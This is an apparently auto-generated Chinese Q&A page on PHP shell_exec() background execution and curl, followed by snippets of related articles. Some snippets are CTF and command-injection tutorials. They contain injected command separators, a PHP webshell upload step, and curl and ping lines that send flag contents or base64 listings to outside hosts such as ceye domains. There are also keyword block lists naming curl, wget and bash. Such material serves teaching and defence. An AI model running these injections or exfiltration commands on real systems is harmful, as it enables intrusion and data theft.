PHP shell_exec()异步等待和curl，并在退出()之后停留

PHP shell_exec()是一个用于执行外部命令的函数。它允许在PHP脚本中调用系统命令，并返回命令的输出结果。

异步等待是指在执行shell命令时，不会阻塞PHP脚本的执行，而是允许脚本继续执行其他任务。这样可以提高脚本的并发性和响应性能。

curl是一个用于发送HTTP请求和获取响应的工具和库。它支持多种协议，包括HTTP、HTTPS、FTP等。在PHP中，可以使用curl库来发送HTTP请求，获取远程服务器的响应数据。

在使用shell_exec()执行命令时，如果希望脚本在执行命令后继续执行其他任务，可以使用异步等待的方式。一种常见的实现方式是使用&符号将命令放入后台执行，例如：

shell_exec('command &');

这样，命令将在后台异步执行，而脚本可以继续执行其他任务。

在退出()之后停留是指在执行shell命令后，脚本会等待命令执行完毕后再退出。这样可以确保命令执行完整，不会被中断。

关于这两个问题的具体应用场景和优势，可以根据具体需求来决定。例如，使用shell_exec()异步等待可以在执行耗时的命令时，不阻塞脚本的执行，提高脚本的并发性和响应性能。而使用curl可以方便地发送HTTP请求，获取远程服务器的响应数据。

腾讯云提供了一系列与云计算相关的产品和服务，包括云服务器、云数据库、云存储等。具体推荐的产品和产品介绍链接地址可以根据具体需求和场景来选择。

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

Swoole 4.4 正式版已发布

向下不兼容改动和 PHP 官方保持一致, 不再支持 PHP7.0 (@matyhtf) 移除 Serialize 模块, 在单独的 ext-serialize 扩展中维护....编写内核功能而非 C/C++ , 提供了以下功能新增高质量 PHP 模块 Coroutine\WaitGroup (@twose) 使用 PHP 代码实现CURL的hook, 一键使CURL协程化,...目前为实验特性, 需特别调用 Runtime::enableCoroutine(SWOOLE_HOOK_CURL) 来开启 (@matyhtf) (@Yurunsoft) 使用 PHP 代码实现 exec...phpredis保持一致 (#2529) (@caohao-php) 默认允许有 100K 个协程同时存在 (c69d320b) (@twose) 支持 bailout 机制 (协程内发生致命错误时能正确退出进程...) (#2579) (@twose) Server 发生错误时会根据情况展示友好的 400/404/503 界面而不是没有任何输出 (@matyhtf) (f3f2be9d) Server 默认开启异步安全重启特性和超大数据发送的自动协程调度功能

9542 0

PHP实现执行外部程序的方法详解

前提 1 PHP没有运行在安全模式，关掉安全模式，即：safe_mode = off 2 禁用函数列表 disable_functions = exec, system, shell_exec,proc_open...php $output = shell_exec('whoami'); echo "$output"; // hedong exit; 注意：当进程执行过程中发生错误，或者进程不产生输出的情况下，都会返回...如果需要检查进程执行的退出码，请使用 exec() 函数。...返回一个和 fopen() 所返回的相同的文件指针，只不过它是单向的（只能用于读或写）并且必须用 pclose() 来关闭。此指针可以用于 fgets()，fgetss() 和 fwrite()。...② proc_open打开的程序作为php的子进程，php退出后该子进程也会退出。

9603 0

从.Git泄露到RCE，赏金10,000美元！

http://example.com/.git/ output 我认为这是在代码中寻找严重问题的好机会，并没有急于报告暴露的 .git，所以结果证明在代码中他们使用了对本地 bash 脚本的调用来通过 shell_exec...保存和删除 ftp用户()函数，它采用未经过滤的用户输入，这导致了 RCE 漏洞为了验证测试请求包，我还必须考虑需要硬编码密钥的简单验证以及请求的最终结果： http://example.com.../ftp-upload/sync.php?... 传输它，并在自己的主机上启动服务器用 ngrok 建立隧道 2.发送一个payload，将我们的 shell 保存在uploads/shell.php 3.使用weevely连接到上传的 shell...经过几天的帮助解决问题后，该公司奖励了我一笔赏金（附上赏金截图）在10个案例中，有9个我没有收到任何东西，有不同的公司欺骗了我，这就是耐心和一致性。

1775 0

超详细讲解命令执行漏洞

等调用的第三方组件存在代码执行漏洞例如： php(system()、shell_exec()、exec()、eval()) JAVA中的命令执行漏洞(struts2/ElasticsearchGroovy...shell_exec <?php highlight_file(__FILE__); if(isset($_REQUEST['url'])){<!...-- -- System.exit(1); //没有参数就退出 } String command = args[0]; Runtime run = Runtime.getRuntime...if re.search(r'''ping|wget|curl|bash|perl|python|php|kill|ps''',cmd): return 'Hacker!'...下禁用高危系统函数找到php.ini，查找到disable_functions，添加禁用的函数名参数的值尽量使用引号包括，并在拼接前调用addslashes进行转义不执行外部的应用程序或命令尽量使用自定义函数或函数库实现外部应用程序或命令的功能

5.5K4 2

PHP 7.4.5的错误修复

curl：修复了错误＃79199（curl_copy_handle（）内存泄漏）。 Date：修复了错误＃79396（DST向前跳转时，DateTime小时不正确）。...OPcache：修复了错误＃79412（Opcache阻塞并在特定脚本上造成100％CPU）。...SimpleXML：修复了错误＃61597（SXE属性可能缺少属性和内容）。 soap：修复了错误＃79357（缺少任何请求参数时SOAP请求段错误）。...标准：修复了错误＃79330（shell_exec（）在空字节后会自动截断）。修复了错误＃79410（如果恰好是4095字节且没有换行符，system（）会吞下最后一个块）。...修复了错误＃79424（调用globfree后php_zip_glob使用gl_pathc）。

1.6K2 0

CTFSHOW终极考核

，会显示让登录看源码有个index.js，在里面找到个flag 于此同时还找到个返回路径，应该是登录成功之后的返回路径，直接拼接试试 checklogin.php?...action=backup 下载的文件里有flag 发现可以新增用户，加了一个用户而且是管理员退出之后用新增的号登录，但是发现不行，退出之后不是到登录界面了，而是回到那个密码锁界面了，目前还不知道密码锁的正确密码...\d{1,2})){3}/', $cmd)){ $res = shell_exec($cmd); stripos(PHP_OS,'WIN')!==FALSE?.../usr/local/lib/php/extensions/no-debug-non-zts-20180731/ curl http://172.2.141.5:80/public.....php $flag="flag_664=ctfshow{35802d184dba134bdc8d0d23e09051f7}"; 写shell 1=echo shell_exec('curl "http

4202 0

Swoole v4.7.0 版本正式发布，Swoole 官网支持直接运行 Swoole 代码

禁用的函数在之前的版本中，如果使用disable_functions将方法进行了禁用，在 HOOK 之后依旧能正常调用。...php -d disable_functions=shell_exec test.php执行之前的版本输出为： PHP Warning: shell_exec() has been disabled...之后，行为和 HOOK 前一致。...PHP Warning: shell_exec() has been disabled for security reasons in /Users/lufei/Swoole/test.php on...line 3 NULL PHP Warning: shell_exec() has been disabled for security reasons in /Users/lufei/Swoole/

5991 0

聊一聊代码、命令执行

php assert($_POST['a']);?> php官方在php7中更改了assert函数。在php7.0.29之后的版本不支持动态调用。 7.0之后的demo <?...php highlight_file(__FILE__); passthru('ls'); ?> shell_exec shell_exec:执行命令，但无回显 demo： <?...php highlight_file(__FILE__); var_dump(shell_exec('ls')); ?> 反引号反引号：执行shell命令，并返回输出的字符串 demo： ", "0.0", $ip); shell_exec("ping"....-c 1;for i in `cat where_is_flag.php`;do ping $i.xxx.ceye.io;done; 注意：只能在curl下有效长度绕过如15位命令执行、7位命令执行

1.4K3 0

Linux基础（day46）

curl curl -x127.0.0.1:80 '111.com/upload/123.php' <?...和mysql cc攻击攻击者借助代理服务器生成指向受害主机的合法请求，实现DDOS和伪装就叫：CC(ChallengeCollapsar)。...的一模块，而且“php -i” 只是php 的一个程序，它和libphp5.so可能有关系也可能没有关系；案例：有时改了php.ini，改动了也重启了服务，结果配置还是不生效；因为使用“php...然后保存退出检查配置文件是否存在语法错误，并重新加载配置文件这时再去访问一遍，会看到tmp目录下生成了php_errors.log [root@hf-01 php-5.6.30]# curl -...= /data/wwwroot/111.com:/tmp 然后保存退出检查配置文件是否存在语法错误，并重新加载配置文件再来访问，会显示正常 [root@hf-01 php-5.6.30]# curl

1.7K1 0

CTF中的RCE绕过

> 上文我们的system与php都被禁止了，这里我们可以看到上面的PHP执行命令函数。我们可以使用里面的shell_exec函数，但是我们要注意，shell_exec函数需要我们把结果输出出来。...c=echo shell_exec('tac/cat fla*); 参数逃逸(ﾉ*･ω･)ﾉ我们看到这个姿势，也是通过一个php判断代码 <?...`：在将括号内的命令处理完毕之后，会将返回的信息传给bash，再次执行。 ;：执行完前面执行后面。...和这个的思路一样，如果我们的执行命令函数被过滤的花花，我们就需要更换函数了我们除了shell_exec()还可以用以下几种 system() passthru() exec() popen() proc_open...cmd=curl `cat /fla*`.域名我们这样写，然后运行，回到我们的ceye中查看flag。

7482 0

CentOS 7.x编译安装Nginx1.10.3+MySQL5.7.16+PHP5.2 5.3 5.4 5.5 5.6 7.0 7.1多版本全能环境

#保存退出 10.2、安装php7.0.17 注意：如果系统是64位，请执行以下命令，否则安装php会出错。...#保存退出 10.7、安装php5.2.17 #编译gd-2.0.35，如果上一步已经编译过，忽略即可。...后记： CentOS 7.x +php 7.0/7.1组合建议使用系统自带的GD库进行编译，php默认去掉了mysql驱动，只有mysqli和mysqlnd驱动。...CentOS 7.x +php 5.5/5.6组合建议使用libgd-2.1.1进行编译，php驱动包括mysql，mysqli和mysqlnd CentOS 7.x +php 5.4组合建议使用系统自带的...后记： php各个小版本的安装过程相同，如php 7.1.2和php 7.1.3安装过程一样，php 7.0.16和php 7.0.17安装过程一样。

1.2K2 1

Alfred 有多强悍，我写了个一键上传图片的 workflow 来告诉你

那么该怎么解决呢，有两种方式一种是找到那些粘贴图片后可以自动上传图床并且生成的图片链接没有防盗链的平台，如 mdnice.com，不过我试了一下 mdnice.com,貌似有 bug，Chrome 和...复制图片/截图后，按下快捷键，自动完成之后上传图片到图床----->获取图片地址----->转成 markdown 中的图片地址(即!...然后我们看看这个上传图片的请求到底是咋样的，按以下步骤，点击 Copy as cURL，可以看看这个 curl 请求长啥样 ? 拷贝出来后的 curl 请求长这样 ?...pngpaste 图片路径于是问题转化成如何获取指定路径图片的二进制数据，shell 做不到，不过 php 可以做到，所以我们最终用 php 重写了上文中的 curl 请求，也就是说我们最终选择用...php 来完成最终的 workflow, 最终的 php 实现的思路如下： ?

1.3K1 0

代码审计从0到1 —— Centreon One-click To RCE

全局过滤数据后，程序引入公共类文件和功能代码 ? 99行$contreon变量在header.php中的$session取出，认证是否登录 ?...，其中$object和$action参数可控 ?...可以看到39行检查$oreon参数是否存在，不存在则直接退出，刚才在分析main.get.php中说，header.php会初始化$oreon参数，这就是为什么要通过main.get.php去访问某些功能点...为了方便构造mib文件，打印出反引号中的命令，并在服务器shell中进行测试 ? 构造/tmp/1.mib文件 ?...命令行执行 centFillTrapDB -f '/tmp/1.mib' -m 3 --severity=info 2>&1 可以清晰的看到command，并且执行了curl命令 ?

8032 0

swoole_proces实现多进程

//写入数据到管道}//子进程结束必须要执行wait进行回收，否则子进程会变成僵尸进程while($ret = swoole_process::wait()){// $ret 是个数组 code是进程退出状态码...已经是异步的了。实际执行时间1s左右。...$redirect_stdin_stdout，重定向子进程的标准输入和输出。启用此选项后，在子进程内输出内容将不是打印屏幕，而是写入到主进程管道（例如用echo打印的内容也写入管道）。...PHP_EOL;}/** * 获取网页http code */function getHttpCode($url){ $ch = curl_init(); curl_setopt($ch,...curl_getinfo($ch); curl_close($ch); return (string)$info['http_code'];} 运行： $ php process_get.phpok.http

7053 0

命令执行漏洞简单讲述

如果页面中存在这些函数并且对于用户的输入没有做严格的过滤，那么就可能造成远程命令执行漏洞 eval()函数定义和用法 eval() 函数把字符串按照 PHP 代码来计算。...] ) PHP 7 bool assert ( mixed assertion [, Throwableexception ] ) assert() 会检查指定的 assertion 并在结果为 FALSE...()函数定义和语法 preg_replace 函数执行一个正则表达式的搜索和替换。...')) { $cmd = shell_exec('ping ' . ...' } } 页面通过request获取传入的ip参数，并获取当前系统类型之后拼接相应命令"ping + target IP"并执行，在此过程中IP参数可控，所以在IP可拼接命令。

7904 0

PHP编程注意事项

PHP函数名和类名不区分大小写的，而变量名是区分大小写的。所以自己写的php模块，往往是大写的问题，编译不通过。...n'); b = a; 如果程序仅执行到这里，b和b是相同的，但是并没有像C那样，a和b占用不同的内存空间，而是指向了同一块内存，这就是php和c的差别，并不需要写成b=&a才表示b指向 function...、exec、passthru、shell_exec、“(与shell_exec功能相同) 如： <?...的作用,它在等待过程中，如果有就返回目前可以读写的句柄数量,以便 //继续读写操作,0则没有可以读写的句柄(完成了) } while ($mrc==CURLM_OK&& $active &&curl_multi_select...，所以导致登陆和退出时所设置的 cookie 路径不同。

2.6K1 0

限定某个目录禁止解析php，限制user_agent， php相关配置

**答：可以理解为浏览器标识了解cc攻击 CC是指攻击者借助代理服务器生成指向受害主机的合法请求，实现DOS和伪装。...因为有curl触发了规则所以输出403 [root@aminglinux 111.com]# curl -x192.168.10.120:80 'http://111.com/123.php' <!...的一模块，而且“php -i” 只是php 的一个程序，它和libphp5.so可能有关系也可能没有关系； [root@aminglinux ~]# cd /data/wwroot/111.com/...这个就是php开启了错误日志的输出功能，但是开启之后呢，我们的有些东西就会泄露出去。...E_NOTICE为生产环境中所选的 #搜索error_reporting 修改为error_reporting = E_ALL #保存退出后，检查读写并重启服务。

1.7K5 0

tp6+webhook 实现自动部署

配置全局邮箱git config --global user.email"你的邮箱"//配置全局密码git config --global user.password"你的密码"//生成本地文件用于记录用户名和密码...3.我们下面用到的shell_exec()函数就是默认这里的user用户7.安装tp6 框架写自动拉取的脚本邮箱Email.php控制器先安装邮箱的依赖环境执行 composer require phpmailer...$e); } }}如果这里使用 exec,shell_exec,system等函数报错需要修改php.ini文件的 disable_functions = 将此选项中的 exec...,shell_exec,system 找到给删掉重启php即可将上述的文件提交到git以后,拉取到服务器,之后随便修改一些地方进行测试提交推送到gitee提交完以后等待gitee响应完成后在webhook...的shell_exec()等函数是被禁用的需要手动开启,其次执行shell_exec()函数默认用户设置的是你www下的目录,所以会执行拉取失败,我们需要手动创建个用户,再去赋予root权限,配置git

76413 0

linux学习第四十二篇：限定某个目录禁止解析php，限制user_agent，PHP相关配置

> curl测试时直接返回了php源代码，并未解析此时没有加上FilesMatch那几行配置，只有php_admin_flag engine off这行配置，所以访问时返回了php源代码，并未解析...加上FilesMatch几行配置之后，访问php文件会出现403状态码，所以访问受到限制，就无法去解析php，也无法看到php的源代码： ? ?...配置完disable_functions之后访问网站就会出现这样： ?...open_basedir可以是多个目录，用：分隔，这里设定的是只可以在1111.com目录和tmp目录下活动 ?...用curl测试，发现500状态码，日志里也说明了只允许在1111.com目录和tmp目录下活动 ? ?

1.2K9 0

干货 | 命令执行漏洞和代码执行漏洞详解

php highlight_file(__FILE__); var_dump(shell_exec('ls')); ?...php eval('echo "hello";'); ?> （3）assert 判断是否为字符串是则当成代码执行在php7.0.29之后的版本不支持动态调用低版本 <?...php assert($_POST['a']); ?> 7.0.29之后 <?php $a = 'assert'; $a(phpinfo()); ?...name=$(tail<flag.php) 5、页面无命令结果的回显 ▪http://192.168.80.30/noecho.php?name=;curl 192.168.9.111:1234?...hh=`ls|base64` ▪http://192.168.80.30/noecho.php?name=;curl 192.168.9.111:1234?

4.2K5 2

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云